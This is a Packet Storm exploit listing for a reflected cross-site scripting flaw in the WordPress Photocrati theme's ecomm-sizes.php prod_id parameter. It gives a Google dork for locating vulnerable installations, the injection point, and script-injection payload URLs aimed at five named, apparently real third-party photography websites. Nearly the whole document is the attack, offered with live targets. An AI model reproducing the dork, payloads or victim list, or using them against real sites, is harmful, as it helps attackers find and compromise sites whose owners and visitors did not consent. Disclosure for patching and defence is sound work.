WordPress Photocrati Cross Site Scripting

2014-01-29T00:00:00
ID PACKETSTORM:124986
Type packetstorm
Reporter ACC3SS
Modified 2014-01-29T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress Photocrati-theme Cross Site Scripting  
  
# Exploit Author : ACC3SS  
  
# Vendor Homepage : http://www.photocrati.com  
  
# Google Dork : inurl :  
inurl:wp-content/themes/photocrati-theme/photocrati-gallery  
  
# Date : 2014-01-29  
  
# Tested on : Windows 7  
######################  
  
# Location :  
localhost/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=[Xss]  
  
######################  
# Demo :  
  
#  
http://abandonphotography.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://remingtonphotographyohio.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://stephimals.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://justinsweet.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://riseupgallery.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
######################  
`